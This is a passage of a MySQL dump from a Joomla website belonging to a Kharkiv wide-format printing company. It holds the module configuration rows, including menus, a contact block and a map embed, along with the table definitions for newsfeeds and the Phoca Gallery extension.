  `asset_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'FK to the #__assets table.',
  `title` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `note` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `content` text COLLATE utf8mb4_unicode_ci,
  `ordering` int(11) NOT NULL DEFAULT '0',
  `position` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `module` varchar(50) COLLATE utf8mb4_unicode_ci DEFAULT NULL,
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `showtitle` tinyint(3) unsigned NOT NULL DEFAULT '1',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `client_id` tinyint(4) NOT NULL DEFAULT '0',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `published` (`published`,`access`),
  KEY `newsfeeds` (`module`,`published`),
  KEY `idx_language` (`language`)
) ENGINE=InnoDB AUTO_INCREMENT=96 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_modules`
--

LOCK TABLES `j25_modules` WRITE;
/*!40000 ALTER TABLE `j25_modules` DISABLE KEYS */;
INSERT INTO `j25_modules` VALUES (1,0,'Main Menu','','',1,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_menu',1,1,'{\"menutype\":\"mainmenu\",\"startLevel\":\"0\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"\",\"moduleclass_sfx\":\"_menu\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(2,0,'Login','','',1,'login',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_login',1,1,'',1,'*'),(3,0,'Popular Articles','','',3,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_popular',3,1,'{\"count\":\"5\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(4,0,'Recently Added Articles','','',4,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_latest',3,1,'{\"count\":\"5\",\"ordering\":\"c_dsc\",\"catid\":\"\",\"user_id\":\"0\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(8,0,'Toolbar','','',1,'toolbar',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_toolbar',3,1,'',1,'*'),(9,0,'Quick Icons','','',1,'icon',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_quickicon',3,1,'',1,'*'),(10,0,'Logged-in Users','','',2,'cpanel',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_logged',3,1,'{\"count\":\"5\",\"name\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\",\"automatic_title\":\"1\"}',1,'*'),(12,0,'Admin Menu','','',1,'menu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',3,1,'{\"layout\":\"\",\"moduleclass_sfx\":\"\",\"shownew\":\"1\",\"showhelp\":\"1\",\"cache\":\"0\"}',1,'*'),(13,0,'Admin Submenu','','',1,'submenu',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_submenu',3,1,'',1,'*'),(14,0,'User Status','','',2,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_status',3,1,'',1,'*'),(15,0,'Title','','',1,'title',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_title',3,1,'',1,'*'),(16,0,'Login Form','','',7,'position-7',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_login',1,1,'{\"greeting\":\"1\",\"name\":\"0\"}',0,'*'),(17,0,'Breadcrumbs','','',1,'position-2',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_breadcrumbs',1,1,'{\"moduleclass_sfx\":\"\",\"showHome\":\"1\",\"homeText\":\"Home\",\"showComponent\":\"1\",\"separator\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(79,0,'Multilanguage status','','',1,'status',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_multilangstatus',3,1,'{\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(86,0,'Joomla Version','','',1,'footer',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_version',3,1,'{\"format\":\"short\",\"product\":\"1\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"0\"}',1,'*'),(87,0,'Главное меню','','',1,'top-main-menu',62,'2022-09-14 17:55:33','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,1,'{\"menutype\":\"mainmenu\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"_menu\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(88,0,'header','','<p style=\"text-align: center;\"><img src=\"images/stories/header.jpg\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" width=\"935\" height=\"300\" style=\"vertical-align: middle; border: 0pt none;\" /></p>',0,'banner',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_custom',1,0,'{\"moduleclass_sfx\":\"\"}',0,'*'),(89,0,'Search','','',0,'advert1',0,'0000-00-00 00:00:00','2019-01-15 11:32:48','0000-00-00 00:00:00',0,'mod_search',1,0,'{\"moduleclass_sfx\":\"\",\"width\":30,\"text\":\"\",\"button\":1,\"button_pos\":\"right\",\"imagebutton\":\"\",\"button_text\":\"\",\"set_itemid\":\"\",\"cache\":1,\"cache_time\":900}',0,'*'),(90,0,'logo','','<p><img src=\"images/stories/logo.png\" border=\"0\" alt=\"широкоформатная печать Харьков\" title=\"широкоформатная печать Харьков\" width=\"300\" height=\"100\" style=\"border: 0pt none;\" />vvvvvvvvvvvvvvvvvvvvvvvvvv</p>',0,'logo',62,'2022-09-14 17:55:17','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,0,'{\"moduleclass_sfx\":\"\"}',0,'*'),(91,0,'Дополнительное меню','','',1,'position-6',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_menu',1,1,'{\"menutype\":\"dop-menu\"}',0,'*'),(92,93,'Телефоны','','<div class=\"tab\">\r\n	<p>моб.: +38-<span>099</span>-407-92-92</p>\r\n	<p class=\"mail\"><a style=\"color: #fff; text-decoration: none;\" href=\"mailto:e@ekvatorprint.com.ua\"><span>E-mail</span> для приема заказов и консультаций:<br /> <span style=\"font-size: 180%;\">e@ekvatorprint.com.ua</span></a><img class=\"click\" src=\"images/click2.png\" alt=\"click2\" width=\"60\" /></p>\r\n</div>',1,'advert1',62,'2022-09-14 18:21:22','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":0,\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*'),(93,0,'Новое доп. меню','','',1,'horiz-dop-menu',62,'2019-02-27 10:29:14','0000-00-00 00:00:00','0000-00-00 00:00:00',1,'mod_menu',1,0,'{\"menutype\":\"dop-menu\",\"startLevel\":\"1\",\"endLevel\":\"0\",\"showAllChildren\":\"0\",\"tag_id\":\"\",\"class_sfx\":\"\",\"window_open\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"itemid\"}',0,'*'),(94,77,'Freestyle Testimonials: Testimonials','','',0,'',0,'0000-00-00 00:00:00','0000-00-00 00:00:00','0000-00-00 00:00:00',0,'mod_fst_test',1,1,'',0,'*'),(95,81,'Карта проезда ЭКВАТОРпринт','','<p>\r\n	<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2565.282835701581!2d36.259719541926216!3d49.98730655408041!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x4127a08178976329%3A0x929eb43a56a79a77!2z0KjQuNGA0L7QutC-0YTQvtGA0LzQsNGC0L3QsNGPINC_0LXRh9Cw0YLRjCDQrdC60LLQsNGC0L7RgNCf0YDQuNC90YI!5e0!3m2!1sru!2sua!4v1530615213192\" width=\"710\" height=\"450\" frameborder=\"0\" style=\"border: 0;\" allowfullscreen=\"allowfullscreen\"></iframe>\r\n</p>',1,'karta',0,'0000-00-00 00:00:00','2016-11-28 15:57:25','0000-00-00 00:00:00',1,'mod_custom',1,1,'{\"prepare_content\":0,\"backgroundimage\":\"\",\"layout\":\"_:default\",\"moduleclass_sfx\":\"\",\"cache\":1,\"cache_time\":900,\"cachemode\":\"static\",\"module_tag\":\"div\",\"bootstrap_size\":\"0\",\"header_tag\":\"h3\",\"header_class\":\"\",\"style\":\"0\"}',0,'*');
/*!40000 ALTER TABLE `j25_modules` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_modules_menu`
--

DROP TABLE IF EXISTS `j25_modules_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_modules_menu` (
  `moduleid` int(11) NOT NULL DEFAULT '0',
  `menuid` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`moduleid`,`menuid`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_modules_menu`
--

LOCK TABLES `j25_modules_menu` WRITE;
/*!40000 ALTER TABLE `j25_modules_menu` DISABLE KEYS */;
INSERT INTO `j25_modules_menu` VALUES (1,0),(2,0),(3,0),(4,0),(6,0),(7,0),(8,0),(9,0),(10,0),(12,0),(13,0),(14,0),(15,0),(16,0),(17,0),(79,0),(86,0),(87,0),(88,30),(89,0),(90,0),(91,0),(92,0),(93,0),(95,0);
/*!40000 ALTER TABLE `j25_modules_menu` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_newsfeeds`
--

DROP TABLE IF EXISTS `j25_newsfeeds`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_newsfeeds` (
  `catid` int(11) NOT NULL DEFAULT '0',
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL DEFAULT '',
  `link` varchar(2048) COLLATE utf8mb4_unicode_ci NOT NULL,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `numarticles` int(10) unsigned NOT NULL DEFAULT '1',
  `cache_time` int(10) unsigned NOT NULL DEFAULT '3600',
  `checked_out` int(10) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `rtl` tinyint(4) NOT NULL DEFAULT '0',
  `access` int(10) unsigned NOT NULL DEFAULT '0',
  `language` char(7) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `params` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(10) unsigned NOT NULL DEFAULT '0',
  `created_by_alias` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `modified_by` int(10) unsigned NOT NULL DEFAULT '0',
  `metakey` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadata` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `xreference` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `description` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `version` int(10) unsigned NOT NULL DEFAULT '1',
  `hits` int(10) unsigned NOT NULL DEFAULT '0',
  `images` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`),
  KEY `idx_state` (`published`),
  KEY `idx_catid` (`catid`),
  KEY `idx_createdby` (`created_by`),
  KEY `idx_language` (`language`),
  KEY `idx_xreference` (`xreference`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_newsfeeds`
--

LOCK TABLES `j25_newsfeeds` WRITE;
/*!40000 ALTER TABLE `j25_newsfeeds` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_newsfeeds` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_overrider`
--

DROP TABLE IF EXISTS `j25_overrider`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_overrider` (
  `id` int(10) NOT NULL AUTO_INCREMENT COMMENT 'Primary Key',
  `constant` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  `string` mediumtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `file` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_overrider`
--

LOCK TABLES `j25_overrider` WRITE;
/*!40000 ALTER TABLE `j25_overrider` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_overrider` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_phocagallery`
--

DROP TABLE IF EXISTS `j25_phocagallery`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_phocagallery` (
  `id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `sid` int(11) NOT NULL DEFAULT '0',
  `title` varchar(250) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `filename` varchar(250) NOT NULL DEFAULT '',
  `format` tinyint(1) NOT NULL DEFAULT '0',
  `description` text,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `hits` int(11) NOT NULL DEFAULT '0',
  `latitude` varchar(20) NOT NULL DEFAULT '',
  `longitude` varchar(20) NOT NULL DEFAULT '',
  `zoom` int(3) NOT NULL DEFAULT '0',
  `geotitle` varchar(255) NOT NULL DEFAULT '',
  `userid` int(11) NOT NULL DEFAULT '0',
  `videocode` text,
  `vmproductid` int(11) NOT NULL DEFAULT '0',
  `imgorigsize` int(11) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `metakey` text,
  `metadesc` text,
  `metadata` text,
  `extlink1` text,
  `extlink2` text,
  `extid` varchar(255) NOT NULL DEFAULT '',
  `exttype` tinyint(1) NOT NULL DEFAULT '0',
  `extl` varchar(255) NOT NULL DEFAULT '',
  `extm` varchar(255) NOT NULL DEFAULT '',
  `exts` varchar(255) NOT NULL DEFAULT '',
  `exto` varchar(255) NOT NULL DEFAULT '',
  `extw` varchar(255) NOT NULL DEFAULT '',
  `exth` varchar(255) NOT NULL DEFAULT '',
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `catid` (`catid`,`published`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_phocagallery`
--

LOCK TABLES `j25_phocagallery` WRITE;
/*!40000 ALTER TABLE `j25_phocagallery` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_phocagallery` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_phocagallery_categories`
--

DROP TABLE IF EXISTS `j25_phocagallery_categories`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_phocagallery_categories` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL DEFAULT '0',
  `owner_id` int(11) NOT NULL DEFAULT '0',
  `title` varchar(255) NOT NULL DEFAULT '',
  `name` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `image` varchar(255) NOT NULL DEFAULT '',
  `section` varchar(50) NOT NULL DEFAULT '',
  `image_position` varchar(30) NOT NULL DEFAULT '',
  `description` text,
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `approved` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `editor` varchar(50) DEFAULT NULL,
  `ordering` int(11) NOT NULL DEFAULT '0',
  `access` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `hits` int(11) NOT NULL DEFAULT '0',
  `accessuserid` text,
  `uploaduserid` text,
  `deleteuserid` text,
  `userfolder` text,
  `latitude` varchar(20) NOT NULL DEFAULT '',
  `longitude` varchar(20) NOT NULL DEFAULT '',
  `zoom` int(3) NOT NULL DEFAULT '0',
  `geotitle` varchar(255) NOT NULL DEFAULT '',
  `extid` varchar(255) NOT NULL DEFAULT '',
  `exta` varchar(255) NOT NULL DEFAULT '',
  `extu` varchar(255) NOT NULL DEFAULT '',
  `extauth` varchar(255) NOT NULL DEFAULT '',
  `extfbuid` int(11) NOT NULL DEFAULT '0',
  `extfbcatid` varchar(255) NOT NULL DEFAULT '',
  `params` text,
  `metakey` text,
  `metadesc` text,
  `metadata` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `cat_idx` (`section`,`published`,`access`),
  KEY `idx_access` (`access`),
  KEY `idx_checkout` (`checked_out`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_phocagallery_categories`
--

LOCK TABLES `j25_phocagallery_categories` WRITE;
/*!40000 ALTER TABLE `j25_phocagallery_categories` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_phocagallery_categories` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_phocagallery_comments`
--

DROP TABLE IF EXISTS `j25_phocagallery_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_phocagallery_comments` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `catid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `comment` text,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_phocagallery_comments`
--

LOCK TABLES `j25_phocagallery_comments` WRITE;
/*!40000 ALTER TABLE `j25_phocagallery_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_phocagallery_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_phocagallery_fb_users`
--

DROP TABLE IF EXISTS `j25_phocagallery_fb_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_phocagallery_fb_users` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `appid` varchar(255) NOT NULL DEFAULT '',
  `appsid` varchar(255) NOT NULL DEFAULT '',
  `uid` varchar(255) NOT NULL DEFAULT '',
  `name` varchar(255) NOT NULL DEFAULT '',
  `link` varchar(255) NOT NULL DEFAULT '',
  `secret` varchar(255) NOT NULL DEFAULT '',
  `base_domain` varchar(255) NOT NULL DEFAULT '',
  `expires` varchar(100) NOT NULL DEFAULT '',
  `session_key` text,
  `access_token` text,
  `sig` text,
  `fanpageid` varchar(255) NOT NULL DEFAULT '',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `comments` text,
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_phocagallery_fb_users`
--

LOCK TABLES `j25_phocagallery_fb_users` WRITE;
/*!40000 ALTER TABLE `j25_phocagallery_fb_users` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_phocagallery_fb_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_phocagallery_img_comments`
--

DROP TABLE IF EXISTS `j25_phocagallery_img_comments`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_phocagallery_img_comments` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `imgid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `comment` text,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_phocagallery_img_comments`
--

LOCK TABLES `j25_phocagallery_img_comments` WRITE;
/*!40000 ALTER TABLE `j25_phocagallery_img_comments` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_phocagallery_img_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_phocagallery_img_votes`
--

DROP TABLE IF EXISTS `j25_phocagallery_img_votes`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_phocagallery_img_votes` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `imgid` int(11) NOT NULL DEFAULT '0',
  `userid` int(11) NOT NULL DEFAULT '0',
  `date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `rating` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_phocagallery_img_votes`
--

LOCK TABLES `j25_phocagallery_img_votes` WRITE;
/*!40000 ALTER TABLE `j25_phocagallery_img_votes` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_phocagallery_img_votes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_phocagallery_img_votes_statistics`
--

DROP TABLE IF EXISTS `j25_phocagallery_img_votes_statistics`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_phocagallery_img_votes_statistics` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `imgid` int(11) NOT NULL DEFAULT '0',
  `count` int(11) NOT NULL DEFAULT '0',
  `average` float(8,6) NOT NULL DEFAULT '0.000000',
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_phocagallery_img_votes_statistics`
--

LOCK TABLES `j25_phocagallery_img_votes_statistics` WRITE;
/*!40000 ALTER TABLE `j25_phocagallery_img_votes_statistics` DISABLE KEYS */;
/*!40000 ALTER TABLE `j25_phocagallery_img_votes_statistics` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_phocagallery_styles`
--

DROP TABLE IF EXISTS `j25_phocagallery_styles`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_phocagallery_styles` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `filename` varchar(255) NOT NULL DEFAULT '',
  `menulink` text,
  `type` tinyint(1) NOT NULL DEFAULT '0',
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `j25_phocagallery_styles`
--

LOCK TABLES `j25_phocagallery_styles` WRITE;
/*!40000 ALTER TABLE `j25_phocagallery_styles` DISABLE KEYS */;
INSERT INTO `j25_phocagallery_styles` VALUES (1,'Phocagallery','phocagallery','phocagallery.css','',1,1,62,'2015-11-30 13:03:45',1,NULL,'*'),(2,'Rating','','rating.css',NULL,1,1,0,'0000-00-00 00:00:00',2,NULL,'*'),(3,'Default','','default.css',NULL,2,1,0,'0000-00-00 00:00:00',3,NULL,'*'),(4,'Bootstrap','','bootstrap.min.css',NULL,1,0,0,'0000-00-00 00:00:00',4,NULL,'*');
/*!40000 ALTER TABLE `j25_phocagallery_styles` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `j25_phocagallery_tags`
--

DROP TABLE IF EXISTS `j25_phocagallery_tags`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `j25_phocagallery_tags` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` varchar(255) NOT NULL DEFAULT '',
  `alias` varchar(255) NOT NULL DEFAULT '',
  `link_cat` int(11) NOT NULL DEFAULT '0',
  `link_ext` varchar(255) NOT NULL DEFAULT '',
  `description` text,
  `published` tinyint(1) NOT NULL DEFAULT '0',
  `checked_out` int(11) unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int(11) NOT NULL DEFAULT '0',
  `params` text,
  `language` char(7) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
